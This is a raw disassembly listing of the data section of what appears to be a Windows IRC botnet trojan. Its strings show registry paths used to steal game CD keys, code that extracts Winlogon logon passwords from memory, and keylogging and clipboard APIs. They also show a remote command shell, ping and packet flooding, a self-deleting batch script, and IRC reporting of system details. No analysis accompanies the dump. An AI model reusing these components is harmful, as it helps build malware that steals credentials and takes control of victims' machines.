aUnrealTourna_0 db 'Unreal Tournament 2003',0
align 10h
db 53h
aOftwareUnrea_0 db 'oftware\Unreal Technology\Installed Apps\UT2003',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aProductid db 'ProductId',0
align 10h
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 10h
aCustomernumber db 'CustomerNumber',0
align 10h
aSoftware3d0Sta db 'Software\3d0\Status',0
aIndustryGiant2 db 'Industry Giant 2',0
align 4
aPrvkey db 'prvkey',0
align 10h
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aHalfLife db 'Half-Life',0
align 10h
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aGunmanChronicl db 'Gunman Chronicles',0
align 4
aKey_0 db 'Key',0
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aTheGladiators db 'The Gladiators',0
align 4
aRegnumber db 'RegNumber',0
align 4
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 10h
aCounterStrikeR db 'Counter-Strike (Retail)',0
aCdkey db 'CDKey',0
align 10h
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: _2:off_42B894�o
align 4
asc_42CA98: ; DATA XREF: sub_408C26+E9�o
; sub_408C26+F4�o
unicode 0, <=>,0
aR: ; DATA XREF: sub_408C26+8F�o
; sub_40EE72:loc_413643�o
unicode 0, <r>,0
aSS_3 db '%s\%s',0 ; DATA XREF: sub_408C26+7E�o
; sub_408EE5+45�o ...
align 4
aSCdKeyS_ db '%s CD Key: (%s).',0 ; DATA XREF: sub_408C26+2B�o
align 4
unk_42CABC db 2 ; DATA XREF: sub_408DCA+C8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesFoundD_ db ' Files found: %d.',0
unk_42CAEC db 2 ; DATA XREF: sub_408DCA+5C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForFi db ' Searching for file: %s.',0
align 4
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_408EE5+107�o
align 4
aS_5 db '%s\*',0 ; DATA XREF: sub_408EE5+1A�o
align 4
unk_42CB3C db 2 ; DATA XREF: sub_409037:loc_4091B0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToEnable db ' Failed to enable Debug Privilege.',0
align 10h
unk_42CB80 db 2 ; DATA XREF: sub_409037:loc_409183�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToFindWi db ' Unable to find Winlogon Process ID.',0
unk_42CBC4 db 2 ; DATA XREF: sub_409037:loc_40917C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToFindTh db ' Unable to find the password in memory.',0
align 4
unk_42CC0C db 2 ; DATA XREF: sub_409037+117�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLogo db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/(no password)).',0
align 4
aUserdomain: ; DATA XREF: sub_409037+DC�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_409037+CE�o
unicode 0, <USERNAME>,0
align 10h
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_409037+9A�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_409037+8D�o
align 4
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_409037+80�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_409037+73�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_409037+68�o
align 10h
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_409037+55�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_409037+40�o
; sub_409037+161�o ...
align 10h
unk_42CD60 db 2 ; DATA XREF: sub_409037+35�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aOnlySupportedO db ' Only supported on Windows NT/2000.',0
align 4
aMsgina db 'MSGINA',0 ; DATA XREF: sub_409209+13E�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_409209+123�o
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_409209+AF�o
align 10h
unk_42CDC0 db 2 ; DATA XREF: sub_40966F+70�o
; sub_409706+C7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLo_0 db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/%S).',0
align 4
unk_42CE2C db 2 ; DATA XREF: sub_409706+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLo_1 db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/(N/A)).',0
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_40981F+C50�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_40981F+C48�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_40981F:loc_40A45A�o
; _6:off_4A1BE8�o
align 10h
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_40981F+BE6�o
align 10h
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_40981F+BD9�o
align 10h
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_40981F+BCC�o
align 10h
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_40981F+BBF�o
align 10h
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_40981F+BB2�o
align 10h
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_40981F+BAA�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_40981F:loc_40A3BC�o
align 10h
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_40981F+B68�o
align 10h
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_40981F+B60�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_40981F:loc_40A372�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_40981F+B0E�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_40981F+B01�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_40981F+AF4�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_40981F+AEC�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_40981F:loc_40A2FE�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_40981F+AAA�o
align 10h
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_40981F+AA2�o
align 10h
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_40981F:loc_40A2B4�o
align 10h
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_40981F+A60�o
align 10h
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_40981F+A58�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_40981F:loc_40A26A�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_40981F+9CE�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_40981F+9C1�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_40981F+9B4�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_40981F+9A7�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_40981F+99A�o
align 10h
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_40981F+98D�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_40981F+980�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_40981F+973�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_40981F+966�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_40981F+959�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_40981F+951�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_40981F:loc_40A15F�o
align 10h
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_40981F+903�o
align 10h
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_40981F+8F6�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_40981F+8EE�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_40981F:loc_40A100�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_40981F+8B4�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_40981F+842�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_40981F+835�o
align 10h
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_40981F+828�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_40981F+81B�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_40981F+80E�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_40981F+801�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_40981F+7F4�o
align 10h
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_40981F+7E7�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_40981F+7DA�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_40981F+7D2�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_40981F:loc_409FE0�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_40981F+688�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_40981F+67B�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_40981F+66E�o
align 10h
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_40981F+661�o
align 10h
aGethostname db 'gethostname',0 ; DATA XREF: sub_40981F+654�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_40981F+647�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_40981F+63A�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_40981F+62D�o
; _2:0042FA44�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_40981F+620�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_40981F+613�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_40981F+60B�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_40981F+5F9�o
align 10h
aRecv db 'recv',0 ; DATA XREF: sub_40981F+5EC�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_40981F+5DF�o
align 10h
aSend db 'send',0 ; DATA XREF: sub_40981F+5D2�o
; sub_40EE72+220D�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_40981F+5C5�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_40981F+5B8�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_40981F+5AB�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_40981F+59E�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_40981F+591�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_40981F+584�o
align 10h
aConnect db 'connect',0 ; DATA XREF: sub_40981F+577�o
; _2:0042FE54�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_40981F+56A�o
aSocket db 'socket',0 ; DATA XREF: sub_40981F+55D�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_40981F+550�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_40981F+543�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_40981F+536�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_40981F+529�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_40981F+51C�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_40981F+50F�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_40981F+507�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_40981F+4F6�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_40981F+483�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_40981F+476�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_40981F+469�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_40981F+45C�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_40981F+44F�o
align 10h
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_40981F+442�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_40981F+435�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_40981F+428�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_40981F+420�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_40981F:loc_409C2E�o
align 10h
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_40981F:loc_409C06�o
align 10h
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_40981F+38F�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_40981F+382�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_40981F+375�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_40981F+368�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_40981F+35B�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_40981F+34E�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_40981F+341�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_40981F:loc_409B58�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_40981F+309�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_40981F+2FC�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_40981F:loc_409B13�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_40981F+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_40981F+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_40981F+292�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_40981F+285�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_40981F+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_40981F+270�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_40981F:loc_409A7E�o
align 4
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_40981F+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_40981F+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_40981F+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_40981F:loc_409A17�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_40981F+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_40981F+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_40981F+186�o
align 10h
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_40981F+179�o
align 10h
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_40981F+16C�o
align 10h
aIswindow db 'IsWindow',0 ; DATA XREF: sub_40981F+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_40981F+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_40981F+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40981F:loc_409954�o
; sub_42105F+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_40981F:loc_409927�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_40981F+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_40981F+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_40981F+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_40981F+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_40981F+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_40981F+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_40981F+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_40981F+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_40981F+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_40981F+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_40981F+23�o
align 4
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_40981F+A�o
align 4
unk_42D764 db 2 ; DATA XREF: sub_40A4AC+2F2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDllTestComplet db ' DLL test complete.',0
align 4
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+2CC�o
align 10h
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+12C�o
align 10h
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+C4�o
align 10h
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+28�o
align 10h
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_40AA35+72�o
align 4
aMirc db 'mIRC',0 ; DATA XREF: sub_40AAFA+5�o
; sub_415C5C+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_40AB7C+1C�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_40AC20+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_40AC42+140�o
align 4
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_40AC42+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_40AC42+48�o
align 4
unk_42D9A8 db 2 ; DATA XREF: sub_40AE02:loc_40AEC1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aNotSupportedBy db ' Not supported by this system.',0
align 4
unk_42D9E8 db 2 ; DATA XREF: sub_40AE02:loc_40AE8F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToAlloca db ' Unable to allocation ARP cache.',0
align 4
unk_42DA28 db 2 ; DATA XREF: sub_40AE02:loc_40AE5B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheIsEmpt db ' ARP cache is empty.',0
align 4
unk_42DA5C db 2 ; DATA XREF: sub_40AE02+49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorGettingAr db ' Error getting ARP cache: <%d>.',0
align 4
unk_42DA9C db 2 ; DATA XREF: sub_40AF86+13C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedSendin db ' Finished sending pings to %s.',0
align 4
unk_42DAD8 db 2 ; DATA XREF: sub_40AF86+6E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSendingPi db ' Error sending pings to %s.',0
align 10h
dword_42DB10 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B112+1C6�o
dd 2BBBB02h
aFinishedSend_0 db ' Finished sending packets to %s.',0
align 4
dword_42DB4C dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B112+8E�o
dd 2BBBB02h
aErrorSending_1 db ' Error sending pings to %s.',0
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_40B390+33�o
dword_42DB94 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B417:loc_40B549�o
dd 2BBBB02h
aCouldNotReadDa db ' Could not read data from proccess.',0Dh,0Ah,0
align 4
dword_42DBD4 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B417+10F�o
dd 2BBBB02h
aProccessHasTer db ' Proccess has terminated.',0Dh,0Ah,0
align 4
dword_42DC0C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B417:loc_40B4FD�o
dd 2BBBB02h
aCouldNotRead_0 db ' Could not read data from proccess',0Dh,0Ah,0
align 4
dword_42DC4C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B56C+194�o
dd 2BBBB02h
aFailedToStartI db ' Failed to start IO thread, error: <%d>.',0
align 10h
dword_42DC90 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B56C+14C�o
dd 2BBBB02h
aRemoteCommandP db ' Remote Command Prompt',0
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40B56C+21�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_40B721+52�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_40B8D8+297�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_40B8D8+192�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_40B8D8:loc_40BA3C�o
align 10h
word_42DDD0 dw 3Fh ; DATA XREF: sub_40B8D8:loc_40B9DA�r
; sub_40D099+1F�o
align 4
dword_42DDD4 dd 28207325h, 297325h ; DATA XREF: sub_40B8D8+EB�o
dword_42DDDC dd 3F3F3Fh ; DATA XREF: sub_40B8D8:loc_40B99B�o
; _0:loc_415C0D�o
a2003 db '2003',0 ; DATA XREF: sub_40B8D8+BA�o
; _2:0042F8DC�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_40B8D8+AA�o
; _0:00415BF8�o
align 4
a2k db '2K',0 ; DATA XREF: sub_40B8D8+98�o
; _0:00415BE8�o
align 10h
aMe db 'ME',0 ; DATA XREF: sub_40B8D8+7E�o
; _0:00415BCF�o
align 4
a98 db '98',0 ; DATA XREF: sub_40B8D8+6C�o
; _0:00415BBF�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_40B8D8+5A�o
; _0:00415BAF�o
align 4
a95 db '95',0 ; DATA XREF: sub_40B8D8+46�o
; _0:00415BA1�o
align 10h
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_40BB8C+A4�o
align 10h
off_42DE40 dd offset loc_412F4E ; DATA XREF: sub_40BB8C:loc_40BBF8�o
dword_42DE44 dd 4E414Ch ; DATA XREF: sub_40BB8C:loc_40BBEE�o
dword_42DE48 dd 6C616944h, 70752Dh ; DATA XREF: sub_40BB8C+5B�o
